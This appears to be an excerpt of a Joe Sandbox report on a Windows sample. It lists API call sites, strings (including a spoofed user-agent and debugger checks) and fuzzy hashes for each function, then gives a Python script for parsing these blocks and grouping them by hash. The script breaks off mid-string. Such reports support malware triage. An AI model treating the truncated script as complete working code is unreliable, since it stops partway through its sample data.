                                                                                                                                                                                            • Opcode Fuzzy Hash: 8200f704f4b117c7a14a8dd6b7e763c6075fa4f129d2980b3cb9b8b9042177fa
                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A31787191122ADBCB31AF20DD4DBEAB7B4BB29304F104194E519A6190EB715ED4CF61
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 00218805
                                                                                                                                                                                              • Part of subcall function 0020B3E8: __EH_prolog3.LIBCMT ref: 0020B3EF
                                                                                                                                                                                              • Part of subcall function 0020E19F: __EH_prolog3.LIBCMT ref: 0020E1A6
                                                                                                                                                                                              • Part of subcall function 0020A2AA: __EH_prolog3.LIBCMT ref: 0020A2B1
                                                                                                                                                                                              • Part of subcall function 00219206: __EH_prolog3_GS.LIBCMT ref: 00219210
                                                                                                                                                                                              • Part of subcall function 00219C00: __EH_prolog3_catch.LIBCMT ref: 00219C07
                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,0024F49C,?,?,?), ref: 00218FAF
                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00218FB6
                                                                                                                                                                                              • Part of subcall function 0020A568: __EH_prolog3_GS.LIBCMT ref: 0020A56F
                                                                                                                                                                                              • Part of subcall function 00206308: __EH_prolog3_GS.LIBCMT ref: 00206312
                                                                                                                                                                                              • Part of subcall function 00206308: GetTempPathA.KERNEL32(00000104,?,0000013C), ref: 0020632A
                                                                                                                                                                                              • Part of subcall function 00216884: __EH_prolog3.LIBCMT ref: 0021688B
                                                                                                                                                                                              • Part of subcall function 00206671: __EH_prolog3_GS.LIBCMT ref: 0020667B
                                                                                                                                                                                            • Sleep.KERNEL32(00000BB8,0024F3A0), ref: 002190F3
                                                                                                                                                                                              • Part of subcall function 00206671: OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00206893
                                                                                                                                                                                            Strings
                                                                                                                                                                                            • (, xrefs: 0021914D
                                                                                                                                                                                            • /Up/, xrefs: 0021909B, 00219113
                                                                                                                                                                                            • Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603, xrefs: 00219002
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                             • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: H_prolog3_$H_prolog3$Heap$DebugFreeH_prolog3_catchOutputPathProcessSleepStringTemp
                                                                                                                                                                                            • String ID: ($/Up/$Mozilla/5.0 (Linux x86_64) AppleWebKit/600.48 (KHTML, like Gecko) Chrome/50.0.2598.249 Safari/603
                                                                                                                                                                                            • API String ID: 3833634691-864039517
                                                                                                                                                                                            • Opcode ID: 16eb36333b2101133628b24668ad07912f918cd3d95c86761a8113da15527184
                                                                                                                                                                                            • Instruction ID: 500869e14c09cd95a05debed312d66218e8ff04b1e36d5b0e338be3f7ee5e268
                                                                                                                                                                                            • Opcode Fuzzy Hash: 16eb36333b2101133628b24668ad07912f918cd3d95c86761a8113da15527184
                                                                                                                                                                                            • Instruction Fuzzy Hash: 73529B31D24358EADB15EBA8C899BDDBBB4AF25300F5040E9A145A71D2DF701F98CF62
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                             • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: __floor_pentium4
                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                                                                                                            • Opcode ID: dcbb5d2d6266d6cabb3ef95914c192579cd8e7f784bdcf86f03cdac8ae91e5ca
                                                                                                                                                                                            • Instruction ID: 19c9ec00f875323a1dc1002f1a28afa467323b7be7cec7cfed3c3180555fdfb9
                                                                                                                                                                                            • Opcode Fuzzy Hash: dcbb5d2d6266d6cabb3ef95914c192579cd8e7f784bdcf86f03cdac8ae91e5ca
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8BD24BB1E282298FDB65CE28DD407EAB7B5EB44304F2441EAD84DF7240D774AE958F41
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,2000000B,002396BB,00000002,00000000,?,?,?,002396BB,?,00000000), ref: 00239442
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20001004,002396BB,00000002,00000000,?,?,?,002396BB,?,00000000), ref: 0023946B
                                                                                                                                                                                            • GetACP.KERNEL32(?,?,002396BB,?,00000000), ref: 00239480
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                             • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                                                                            • Opcode ID: 52d8eff1c36bdb30ced7fe7556a4ef67e079b54a0f27c2858695ff5c69727b71
                                                                                                                                                                                            • Instruction ID: 09c67194e47768126450cc5bd5803ac7fcf68dbb5a6a5ed28f18ee8ddf7db285
                                                                                                                                                                                            • Opcode Fuzzy Hash: 52d8eff1c36bdb30ced7fe7556a4ef67e079b54a0f27c2858695ff5c69727b71
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B21F5E2A30106A6EB348F54D908B9773A6FB42B50F168064EA0EC7210E7B2DDE2C350
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 002313A9: GetLastError.KERNEL32(00000000,00000000,00237270), ref: 002313AD
                                                                                                                                                                                              • Part of subcall function 002313A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0023144F
                                                                                                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0023968D
                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 002396CB
                                                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 002396DE
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00239726
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00239741
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                             • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                             • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                            • String ID:
• API String ID: 415426439-0
• Opcode ID: cde53c060e7e5aa3c268874fe1a6a5ad50fb5bd7a9852bb19585b59b6f0066eb
• Instruction ID: 111f1a671d0787e319e60c43c3ae719b8da1485f7477eb4177169df0369ba19b
• Opcode Fuzzy Hash: cde53c060e7e5aa3c268874fe1a6a5ad50fb5bd7a9852bb19585b59b6f0066eb
• Instruction Fuzzy Hash: 5F518EF1A20206AFDB10EFA5DC45AAEB7BCAF06700F144469F504EB190DBB099A4CF61
APIs
  • Part of subcall function 002313A9: GetLastError.KERNEL32(00000000,00000000,00237270), ref: 002313AD
  • Part of subcall function 002313A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0023144F
• GetACP.KERNEL32(?,?,?,?,?,?,0022D8F1,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 00238CB8
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0022D8F1,?,?,?,00000055,?,-00000050,?,?), ref: 00238CEF
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00238E54
Strings
Memory Dump Source
• Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
• Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
Similarity
• API ID: ErrorLast$CodeInfoLocalePageValid
• String ID: utf8
• API String ID: 607553120-905460609
• Opcode ID: 30ef539e7a798e9c22faaf7315510b34aebb49f0ffa25e692dcbbcc544389893
• Instruction ID: 527b76f1aae921193706e35001f6a46bbef212821c5f9663d92b85057ae0091b
• Opcode Fuzzy Hash: 30ef539e7a798e9c22faaf7315510b34aebb49f0ffa25e692dcbbcc544389893
• Instruction Fuzzy Hash: EC71E7F2620307AADB29AF74CC46BAA73A8EF15710F14446AF505DF1C1EF70E9648B61
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b54f330be523bf74fb6e165f179a1ee627a2c41003d33122c132f8584647ece6
• Instruction ID: d5c108d0e1415603f0041d0042ce67a8f46f166363ee73421c36a35c3737c177
• Opcode Fuzzy Hash: b54f330be523bf74fb6e165f179a1ee627a2c41003d33122c132f8584647ece6
• Instruction Fuzzy Hash: 53024D71E1122AABDF14CFA8D8807AEF7B1FF48314F14826AD915E7380DB31A955CB90
APIs
• IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 0021D3DC
• IsDebuggerPresent.KERNEL32 ref: 0021D4A8
• SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0021D4C1
• UnhandledExceptionFilter.KERNEL32(?), ref: 0021D4CB
Similarity
• API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
• String ID:
• API String ID: 254469556-0
• Opcode ID: fe2d7500e417b5aee4a195a61c5ef386176006161da175618b6b636c187539f8
• Instruction ID: 83bc0a3d9218c853a8790e4924c636eda81a2294b187decadd3c25233ec9a815
• Opcode Fuzzy Hash: fe2d7500e417b5aee4a195a61c5ef386176006161da175618b6b636c187539f8
• Instruction Fuzzy Hash: 77310775D01228DBDB20EFA4D9897CDBBB8BF18300F1041AAE40CAB250E7719A84CF45
APIs
• GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00232F55,00000000,00000000,00000000), ref: 00232E14
Strings
Similarity
• API ID: InformationTimeZone
• String ID: U/#$]/#
• API String ID: 565725191-1733638092
• Opcode ID: 97956425083656ec42fcf562afffea0d065d3f030354fa54de2acd466812b9db
• Instruction ID: 9f2ea0c7efffebaeb111fb704213fe46da83dd7ccf19b479fdccf245b4260f09
• Opcode Fuzzy Hash: 97956425083656ec42fcf562afffea0d065d3f030354fa54de2acd466812b9db
• Instruction Fuzzy Hash: 1BC14BF1D20226EBDB10AFA4DC06ABE77B9EF04710F244056F905EB291E7709E65CB94
APIs
  • Part of subcall function 002313A9: GetLastError.KERNEL32(00000000,00000000,00237270), ref: 002313AD
  • Part of subcall function 002313A9: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0023144F
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00239074
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 002390BE
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00239184
Similarity
• API ID: InfoLocale$ErrorLast
• String ID:
• API String ID: 661929714-0
• Opcode ID: 8fc0381ee7472fe74d2751ad7fad9cfcea0cc335630eb49025be3bf814b5432c
• Instruction ID: 5bc62a13734acf7b09cc00c6a0163d6e8cb4b290e53fd727a8ee9ec9c4983bbb
• Opcode Fuzzy Hash: 8fc0381ee7472fe74d2751ad7fad9cfcea0cc335630eb49025be3bf814b5432c
• Instruction Fuzzy Hash: 0961A5B1520607AFDB249F28CC96BBAB7A8EF46300F144079ED09D6681E7B4D9E5CF50
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0022B7E4
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0022B7EE
• UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 0022B7FB
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: d59f1e320c4a6e31a41e688241f8f050737505263eeeb64634a341bd5c004805
• Instruction ID: a0ba4b2e998bedff55d3f3077d2517ec02cfb06fca237f73afb064dcb458f913
• Opcode Fuzzy Hash: d59f1e320c4a6e31a41e688241f8f050737505263eeeb64634a341bd5c004805
• Instruction Fuzzy Hash: 8131D274911229ABCB21DF64E889BCCBBB8BF18310F5041EAE40CA6261E7709B958F55
APIs
• GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,002052B9,00000000), ref: 00224EDB
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00224EFA
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1518329722-0
                                                                                                                                                                                            • Opcode ID: 611302253a0291f7d5107e31756f922e57d122ac0c47b67eeb6f4b0e60dc66a3
                                                                                                                                                                                            • Instruction ID: 7cad87ea94091e1394a2907381a2053edbbbbbc17a82e12fcd5ee0c448136962
                                                                                                                                                                                            • Opcode Fuzzy Hash: 611302253a0291f7d5107e31756f922e57d122ac0c47b67eeb6f4b0e60dc66a3
                                                                                                                                                                                            • Instruction Fuzzy Hash: 64F02DB1A102257B4724EFADEA0489EBEE9EFC57707254155F809D3754E570DD01C790
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: Z !$Z !
                                                                                                                                                                                            • API String ID: 0-1985138166
                                                                                                                                                                                            • Opcode ID: 715712f29d670a95aff59f5fba2e1e57a807b9476c7315398adea803938ab135
                                                                                                                                                                                            • Instruction ID: 4fd8f7fe35af3485c1d6b5ec003bd90c52860ba49f189816d69bc42c6996755d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 715712f29d670a95aff59f5fba2e1e57a807b9476c7315398adea803938ab135
                                                                                                                                                                                            • Instruction Fuzzy Hash: DBF12972E1021A9FCF08CFA8D991AEDB7F2BF98310F248169E455A7344D734AE55CB60
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 0-3916222277
                                                                                                                                                                                            • Opcode ID: 295db234734d761d94158b5f97da22d78615a2e368034af9bd1b703066b22697
                                                                                                                                                                                            • Instruction ID: 0acb8add55f6b7049665ceac611073384be5f3bdb285d2620bf15055e7a7532d
                                                                                                                                                                                            • Opcode Fuzzy Hash: 295db234734d761d94158b5f97da22d78615a2e368034af9bd1b703066b22697
                                                                                                                                                                                            • Instruction Fuzzy Hash: D042CE71A10A56DFCB19CF69C4806A9FBF1FF08304F18816AD459E7B82D734A9A5CF80
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0023AA69,?,?,00000008,?,?,0023FA4F,00000000), ref: 0023AC9B
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionRaise
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3997070919-0
                                                                                                                                                                                            • Opcode ID: 2b19202797d66fc3128c8a7eb4b72b630d6b0918ddb7299b2cfce1c8d29c3d33
                                                                                                                                                                                            • Instruction ID: 455174a3d0d06aba5a52dc8374dc63ddd7308eae8e2db86bcad727e8bc6409eb
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b19202797d66fc3128c8a7eb4b72b630d6b0918ddb7299b2cfce1c8d29c3d33
                                                                                                                                                                                            • Instruction Fuzzy Hash: 3CB19E71220609CFD719CF28C48AB657BE1FF05364F258669E8DACF2A1C335D9A2CB41
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0021D1F5
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FeaturePresentProcessor
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2325560087-0
                                                                                                                                                                                            • Opcode ID: 009077de63503df796a9847a9c079f3b5d3c31ad6d36fec90a9c93878d56ad63
                                                                                                                                                                                            • Instruction ID: cdc3130a18059cb3d74de2cd0beec2bbc8ce1d4c18313a5b426a68eb88603701
                                                                                                                                                                                            • Opcode Fuzzy Hash: 009077de63503df796a9847a9c079f3b5d3c31ad6d36fec90a9c93878d56ad63
                                                                                                                                                                                            • Instruction Fuzzy Hash: 18517B71A21206CFEB18CF64E9897AABBF0FB54311F24846AD811EB291E774D990CF51
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ff8594604197e8e3b63ed52ede3cbbcc7108b6caa100b9a05baff67a65b3a9b2
                                                                                                                                                                                            • Instruction ID: a99af515be5b5971857e38dc857514850231f42a5dfbdab971dd2b1f8d8f166d
                                                                                                                                                                                            • Opcode Fuzzy Hash: ff8594604197e8e3b63ed52ede3cbbcc7108b6caa100b9a05baff67a65b3a9b2
                                                                                                                                                                                            • Instruction Fuzzy Hash: FF41C4B5C1562DAFDF20DF69CC89AAABBB9AF45300F1442D9E40DE3201DA349E948F50
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2505754480.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2505732647.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505788584.0000000000246000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505815361.0000000000259000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2505835637.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_200000_OXoeX1Ii3x.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                            • API String ID: 0-4108050209
                                                                                                                                                                                            • Opcode ID: 349938bc103d0dec82b1fd7c3eddd669f8bb5247fb9641501179edb1743633b0
                                                                                                                                                                                            • Instruction ID: f14e03b53865b882a239a22181db6bbb215c82edf234b3761bc9d840bbb819b3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 349938bc103d0dec82b1fd7c3eddd669f8bb5247fb9641501179edb1743633b0
                                                                                                                                                                                            • Instruction Fuzzy Hash: 05C13270920727AFCB26CFE8E69067AB7B1EF05300F140619E46687E91C376AD75CB52
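
The blocks above are the report's per-function metadata: call sites with their in-memory addresses, the dump they were lifted from (whose `Offset:` is the module's load address), and the similarity fields Joe Sandbox derives for the function. Two things in them are worth automating when hunting across reports: turning each `ref:` address into an RVA against that `Offset:`, so the site can be found in the on-disk PE whatever base the loader picked, and grouping functions by a similarity field such as `API String ID` or `Instruction Fuzzy Hash`. The Python below is an added example, not part of the report or of Joe Sandbox: it parses the text form of these blocks into records, strips the `Download File` link text that text extraction fuses onto the `Associated` dump names, and provides the RVA and grouping helpers. The excerpt it parses is copied from two of the blocks above with the lists shortened; the hashing behind the IDs is not reproduced, only the field values are carried.

```python
"""Parse the per-function metadata blocks of a Joe Sandbox report ('APIs', 'Strings',
'Memory Dump Source', 'Joe Sandbox IDA Plugin', 'Similarity') into records that can be
pivoted across reports, with 'ref:' call sites converted to RVAs. Added example; not Joe Sandbox code."""
import re
from collections import namedtuple
from dataclasses import dataclass, field

# Call-site shapes seen under 'APIs': with arguments, without arguments (the LIBCMT
# helper), and prefixed with 'Part of subcall function <addr>:' for nested calls.
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
                    r"(?P<name>\S+?)\.(?P<module>[A-Za-z0-9_]+)"
                    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SOURCE_RE = re.compile(r"^(?P<dump>[^,]+), Offset: (?P<offset>[0-9A-Fa-f]+), based on PE: (true|false)$")
SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LINK_SUFFIX = "Download File"   # link text that text extraction glues onto the dump names
ApiCall = namedtuple("ApiCall", "name module args ref subcall_of")   # ref/subcall_of are ints

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    dump: str = ""
    base: int = 0               # 'Offset:' of the source dump, i.e. the module's load address
    associated: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)   # IDs and fuzzy hashes keyed by their label

    def rvas(self):
        """(API name, ref - base): locates each call site in the on-disk PE whatever base ASLR chose."""
        return [(c.name, c.ref - self.base) for c in self.apis]

def parse_blocks(text):
    """'Instruction Fuzzy Hash' is the last item of every block, so it closes a record."""
    records, cur, section = [], FunctionRecord(), None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line or line in SECTIONS:
            section = line or section
            continue
        if section == "APIs" and (m := API_RE.match(line)):
            cur.apis.append(ApiCall(m["name"], m["module"], m["args"].split(",") if m["args"] else [],
                                    int(m["ref"], 16), int(m["sub"], 16) if m["sub"] else None))
            continue
        if section == "Strings":
            cur.strings.append(line)
            continue
        key, _, value = (part.strip() for part in line.partition(":"))
        if key == "Source File":
            if src := SOURCE_RE.match(value):
                cur.dump, cur.base = src["dump"], int(src["offset"], 16)
        elif key == "Associated":
            cur.associated.append(value.removesuffix(LINK_SUFFIX))
        else:
            cur.fields[key] = value
            if key == "Instruction Fuzzy Hash":
                records.append(cur)
                cur, section = FunctionRecord(), None
    return records

def pivot(records, label):
    """Group by a similarity field; empty values carry no signal for matching and are skipped."""
    groups = {}
    for rec in records:
        if rec.fields.get(label):
            groups.setdefault(rec.fields[label], []).append(rec)
    return groups

# Excerpt copied from two of the blocks above (lists shortened), including the
# 'Download File' suffix exactly as text extraction leaves it on 'Associated' lines.
SAMPLE = """
APIs
• GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,002052B9,00000000), ref: 00224EDB
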